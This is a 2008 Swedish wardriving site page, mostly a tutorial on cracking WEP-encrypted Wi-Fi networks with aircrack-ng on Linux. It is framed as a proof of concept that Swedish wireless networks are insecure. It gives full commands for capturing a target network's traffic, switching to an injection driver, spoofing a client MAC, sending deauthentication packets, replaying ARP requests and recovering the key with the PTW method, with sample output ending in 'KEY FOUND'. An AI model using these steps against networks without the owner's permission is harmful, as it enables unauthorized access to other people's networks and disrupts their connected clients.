Logfilsuppladdning

Ladda upp din senaste wardrive-session här. Ange din kismet .xml-fil eller din Netstumbler .sum-fil och klicka på "Ladda upp". När du fått svar kan du direkt se dina punkter på kartan.
Logfilstyp:
Logfil:

Bloggtaggar

Nu även stöd för Netstumbler .sum-filer
Så här knäcker man WEP
Läs hur man förskansar sig nätversnyckeln till ett wep-krypterat nätverk. Artikeln har tillkommit som ett "proof of concept", som ett underlag till utgångspunkten: Svenska trådlösa nätverk är generellt osäkra.
Metodiken är densamma oberoende vilken plattform man har, men vi väljer att beskriva hur man gör, och vilka verktyg man använder under ett Linux-baserat operativ. Förutsättningar för guiden är att du har en dator med ett trådlöst nätverkskort. Jag har själv en HP nc8430 laptop med ett Intel 3945abg trådlöst nätverkskort vilket jag utgår ifrån i guiden. Jag är alltså helt standard.

1. Har vi inte verktygen så skaffar vi dem.
Vi behöver följande verktygslåda under Linux:
aircrack-ng
Installationsrutinen är lite beroende av plattform men du kan alltid kompilera (bygga ihop) själv från source (källkoden). Den hittar du i ovanstående länk en bit ner på sidan under rubriken "downloads". Räds inte, det är bara att följa instruktionerna i INSTALL-filen efter man packat upp i lämplig mapp.

Sitter du med UBUNTU och har aptitude som pakethanterare är det väldigt enkelt. Skriv bara följande (du behöver vara root för att installera och i mitt exempel använder jag kommandot sudo för detta): 
sudo apt-get install aircrack-ng

Alternativet till att installera Linux på din maskin och ovanstående program är att köra en så kallad "Live CD" som redan har dessa program installerade. Exempelvis BackTrack. Det är ett bra sätt att börja med linux på. Man sparar inte ner dumheter utan börjar alltid med samma inställningar efter omstart.

2. Först måste vi hitta vårt nätverk och relevant information kring det.
I aircrack-ng paketet finner vi programmet airodump-ng vilket vi använder för att lokalisera och spela in våra "målnät". Programmet airodump-ng måste veta vilket trådlöst nätverkskort det skall lyssna på. För att se vilka trådlösa nätverkskort vi har monterade och dess "handtag" (interface) skriver vi: 
sudo airmon-ng

...och presenteras, i mitt fall när jag kör standardrivern, av... 
Interface        Chipset        Driver

eth1             Centrino b/g   ipw3945

Jag ser nu att det är eth1 som används och det är här vi skall lyssna. Starta nu airodump-ng med kommandot: 
sudo airodump-ng eth1

Vi får nu en växande lista av närliggande accesspunkter som kan se ut såhär: 
 CH  5 ][ Elapsed: 24 mins ][ 2008-05-08 11:58

 BSSID             PWR Beacons #Data, #/s CH MB  ENC  CIPHER AUTH ESSID

 00:1C:F0:5F:C9:4D  -1    3379     9    0 11 54. WPA2 CCMP   PSK  Test_1
 00:15:E9:6D:52:9D  -1     989    72    0  6 54  WEP  WEP         Test_2
 00:19:5B:8A:7F:C3  -1    1410    67    0  1 54. WPA  CCMP   PSK  Test_3
 00:1B:11:E6:F1:81  -1     154     0    0  6 54. OPN              Test_4

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:15:E9:6D:52:9D  00:18:8D:0D:12:F0   -1     0       10  Test_2

Den undre raden visar anslutande klienter. Genererar du inte trafiken själv (mer om det senare), är du i stort behov av dessa. I kolumnen "Probes" ser du vilket SSID klienten söker. "BSSID" visar AP'ns mac-adress, och under "STATION" finner du klientens mac-adress.

3. Nu behöver vi "spela in" trafiken från vårt "målnät" för att få ett dataunderlag.
Tittar vi på ovanstående resultat ser vi snabbt att där finns ett wep-krypterat nät med ssid: "Test_2". - Finns ju även ett öppet nätverk som heter Test_4, säger ni då. Visst gör det. Men behöver ni en guide för att komma in i ett okrypterat nätverk? Tänkte väl det.

Nu har vi det vi behöver veta för att spela in trafik från Test_2. Vi använder samma kommando som ovan fast vi definerar vårt målnät med dess mac-adress (bssid) och en filsökväg för vår data genom att skriva: 
sudo airodump-ng --bssid 00:15:E9:6D:52:9D -w dumpen eth1

Nu skrivs den sparade datan till filen dumpen-01.cap och en sammanställning av det vi ser i terminalen sparas i filen dumpen-01.txt. I terminalen ser du det här: 
 CH  6 ][ Elapsed: 54 mins ][ 2008-05-08 11:59

 BSSID             PWR Beacons   #Data, #/s CH MB  ENC  CIPHER AUTH ESSID

 00:15:E9:6D:52:9D  -1     989  684002    0  6 54  WEP  WEP         Test_2

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:15:E9:6D:52:9D  00:18:8D:0D:12:F0   -1     0       10  Test_2

Låt det hela rulla på och du ser hur värdet under #Data ökar successivt. Detta värdet anger hur många unika IV's ( initialiseringsvektorer) du lagt vantarna på. Hur många IV's behöver jag då? Ja du kompis... det är lite beroende på nyckelns längd och accesspunkt. Men har du låg trafik till accesspunkten kan du ställa bilen med datorn igång och ta bussen hem ....det är så många du behöver.... Nåväl när värdet når runt 200.000 kan du starta aircrack-ng.

4. Nu knäcker vi.
Du kan köra knäckningsprogrammet samtidigt som du dumpar trafiken. Öppna en ny terminal och skriv: 
sudo aircrack-ng dumpen-01.cap

Då kommer det se ut ungefär så här när det är klart (128-bitars nyckel): 
                                             Aircrack-ng 0.7 r130


                              [00:00:10] Tested 77 keys (got 684002 IVs)

 KB    depth   byte(vote)
  0    0/  1   AE( 199) 29(  27) 2D(  13) 7C(  12) FE(  12) FF(   6) 39(   5) 2C(   3) 00(   0) 08(   0) 
  1    0/  3   66(  41) F1(  33) 4C(  23) 00(  19) 9F(  19) C7(  18) 64(   9) 7A(   9) 7B(   9) F6(   9) 
  2    0/  2   5C(  89) 52(  60) E3(  22) 10(  20) F3(  18) 8B(  15) 8E(  15) 14(  13) D2(  11) 47(  10) 
  3    0/  1   FD( 375) 81(  40) 1D(  26) 99(  26) D2(  23) 33(  20) 2C(  19) 05(  17) 0B(  17) 35(  17) 
  4    0/  2   24( 130) 87( 110) 7B(  32) 4F(  25) D7(  20) F4(  18) 17(  15) 8A(  15) CE(  15) E1(  15) 
  5    0/  1   E3( 222) 4F(  46) 40(  45) 7F(  28) DB(  27) E0(  27) 5B(  25) 71(  25) 8A(  25) 65(  23) 
  6    0/  1   92( 208) 63(  58) 54(  51) 64(  35) 51(  26) 53(  25) 75(  20) 0E(  18) 7D(  18) D9(  18) 
  7    0/  1   A9( 220) B8(  51) 4B(  41) 1B(  39) 3B(  23) 9B(  23) FA(  23) 63(  22) 2D(  19) 1A(  17) 
  8    0/  1   14(1106) C1( 118) 04(  41) 13(  30) 43(  28) 99(  25) 79(  20) B1(  17) 86(  15) 97(  15) 
  9    0/  1   39( 540) 08(  95) E4(  87) E2(  79) E5(  59) 0A(  44) CC(  35) 02(  32) C7(  31) 6C(  30) 
 10    0/  1   D4( 372) 9E(  68) A0(  64) 9F(  55) DB(  51) 38(  40) 9D(  40) 52(  39) A1(  38) 54(  36) 
 11    0/  1   27( 334) BC(  58) F1(  44) BE(  42) 79(  39) 3B(  37) E1(  34) E2(  34) 31(  33) BF(  33) 

                          KEY FOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ]

5. Optimera din knäckning.
Behöver det ta så här lång tid för att knäcka en wep-nyckel? Man skriver ju överallt att det går på ett par minuter. Helt sant! Dekryptering av wep har kommit längre än såhär. Men nu kan vi grunderna och genom att bara lyssna, och inte interagera, kan vi dessutom helt lagligt tillgodogöra oss nätverksnyckeln.

Nyare metoder gör det möjligt att knäcka koden med en tiondel av det antalet IV's som man behöver för den traditionella metoden. Men denna metod är beroende av att en viss typ av kommunnikation insamlas: ARP-förfrågningar och dess svar. Metoden kallas PTW (utvecklat av Darmstadt University of Technology. Tysk precision!). För att få så många ARP-förfrågningar som krävs (inom en rimlig tidsram, låt säga 5 minuter), behöver man själv "injicera" denna trafik. Man lurar alltså AP'n, som är målet för vår attack (japp, det har blivit en attack då vi nu tar kontakt med AP'n), att svara på ARP-förfrågningar som den i sin tur tror är från en redan ansluten (associerad) klient.

För att injicera information till nätverksströmmen behöver du ett nätverkskort som är kompatibelt med detta, samt drivrutiner. En kompetent lista över detta finner du i backtrack's dokumentation med direktlänk här. Ta nu inte lätt på denna information. Skriver med fetstil för säkerhets skull. Är ni seriösa med er trådlösa hobby ser ni till att finna ett kort som stöder injicering och har kontaktdon för externa antenner. Aircrack-ng dokumentationen har även en fenomenal "howto" på hur du finner, och installerar "patchade" drivers för de kort som stöds. Direlktlänk finner du här.

Själv sitter jag, i skrivande stund, med ett Intel 3945. Långt ifrån ballt men det är det jag har i den här laptopen. Den drivrutin jag använder mig av för injicering är ipwraw.

Jag ersätter ipw3945 - drivern med ipwraw genom att skriva: 
sudo modprobe -r ipw3945
sudo modprobe ipwraw

...kollar om vi har ett annat namn på interfacet nu när vi bytt driver genom ... 
sudo airmon-ng

...får då till svar: 
Interface	Chipset		Driver

wifi0		Centrino a/b/g	ipwraw-ng

aha..nu heter interfacet wifi0...nu ser vi till att interfacet är "uppe" genom: 
sudo ifconfig wifi0 up


6. Så här undersöker jag om mitt nätverkskort stöder injicering.
Skriv följande för att testa ditt nätverkskort/driver: 
sudo aireplay-ng -9 wifi0

...och får i mitt fall svaret: 
10:25:39  Trying broadcast probe requests...
10:25:39  Injection is working!
10:25:40  Found 3 APs

... forts.


Titta efter strängen "Injection is working!". Fungerar det så står det så. Står det inte så, då fungerar det inte.

7. aircrack-ng och PTW

PTW-metoden är beroende av ARP-paket. HELA ARP-paket, inte bara initialiseringsvektorerna. Använd alltså inte växeln --ivs när du kör airodump-ng. Nedanstående arbetsbeskrivningar förutsätter att ni redan har hittat det nät ni vill ha åtkomst till och att ni börjat spela in denna trafik med airodump-ng enligt ovan. Jag kommer även använda mig av den information vi fått i exemplen ovan vad gäller accesspunkter och klienter. Som vi nämde tidigare krävs det ju en hel del paket innan det är lönt att försöka knäcka. Därför börjar vi med att beskriva olika metoder att skapa den trafik vi behöver.

7.1 Deassociering + ARP-förfrågan/svar-attack:
Denna metod kör man när det redan finns en associerad klient. Alltså någon som redan är uppkopplad mot den accespunkt man vill in i. Först startar vi programmet aireplay-ng för att spela in, och sedan spela upp fångade ARP-förfrågningar. I vårt testexempel skulle det se ut så här: 
sudo aireplay-ng -3 -b 00:15:E9:6D:52:9D -h 00:18:8D:0D:12:F0 wifi0

Där...
-b 00:15:E9:6D:52:9D är accesspunktens MAC-adress
-h 00:18:8D:0D:12:F0 är den associerade klientens MAC-adress
wifi0 är det nätverksinterface vi använder (se ovan).

Systemet svarar med: 
The interface MAC (00:18:DE:33:5C:DF) doesn't match the specified MAC (-h).
ifconfig wifi0 hw ether 00:18:8D:0D:12:F0
Saving ARP requests in replay_arp-0602-084450.cap
You should also start airodump-ng to capture replies.
Read 2118 packets (got 0 ARP requests), sent 0 packets...(0 pps)

Systemet svarar att den MAC-adress vi anger som klient inte är vår egen, och "spoofar" den vi angivit.
Vi låter paketen snurra in och öppnar ännu en terminal där vi skriver: 
sudo aireplay-ng -0 -1 -a 00:15:E9:6D:52:9D -c 00:18:8D:0D:12:F0 wifi0

Där...
-a 00:15:E9:6D:52:9D är accesspunktens MAC-adress
-c 00:18:8D:0D:12:F0 är den associerade klienten

Vad vi i själva verket gör är att vi låtsas vara den associerade klienten och att vi inte vill vara anslutna längre, Vi deassocierar. Varpå klienten reassocierar. I och med detta skickas den ARP-förfrågan vi väntar på.

Nu borde det se ut ungefär så här: 
The interface MAC (00:18:DE:33:5C:DF) doesn't match the specified MAC (-h).
ifconfig wifi0 hw ether 00:18:8D:0D:12:F0
Saving ARP requests in replay_arp-0602-084729.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
08:47:48  Packets per second adjusted to 375 402 packets...(21 pps)
08:47:51  Packets per second adjusted to 282 539 packets...(27 pps)
08:47:53  Packets per second adjusted to 212 673 packets...(33 pps)
08:47:56  Packets per second adjusted to 159 822 packets...(39 pps)
Read 275420 packets (got 40170 ARP requests), sent 50491 packets...(63 pps)

Nu börjar det hända saker. Vi ser även i vår terminal där vi kör airodump-ng, att värdet under #Data växer avsevärt. När detta värde når ca 20.000 kan ni starta knäckningen genom att skriva: 
sudo aircrack-ng -z dumpen-*.cap

Flaggan -z anger att vi använder PTW-metoden. Inom ett par sekunder har du det dekrypterade lösenordet och då kan det se ut såhär: 
                                 [00:00:05] Tested 4/140000 keys (got 41671 IVs)

   KB    depth   byte(vote)
    0    0/  1   07( 248) 52( 193) BC( 192) 16( 190) 6A( 190) B6( 189) 81( 188) 68( 187) EA( 187) 38( 186) 
    1    0/  2   06( 213) DA( 205) 9F( 192) 06( 190) 4D( 189) E5( 189) 0F( 188) E4( 187) 49( 186) BF( 185) 
    2    0/  1   56( 229) 1E( 195) 27( 193) C3( 193) 39( 189) 69( 187) FB( 187) 21( 186) A6( 186) 65( 185) 
    3    0/  2   B3( 201) 89( 193) 71( 192) B0( 192) D9( 192) 8D( 191) CF( 190) 5A( 189) 69( 188) 6F( 188) 
    4    0/  1   19( 224) 0C( 200) 75( 193) 8B( 192) C2( 192) 4B( 189) 79( 189) F0( 189) CF( 187) D4( 186) 

                         KEY FOUND! [ 07:01:23:45:67 ] 
        Decrypted correctly: 100%


Kommer mer inom kort...


8. Berörda manualer.
aircrack-ng

 

Kommentarer (0)Add Comment

Skriv kommentar

busy
Senast uppdaterad ( torsdag, 19 juni 2008 20:05 )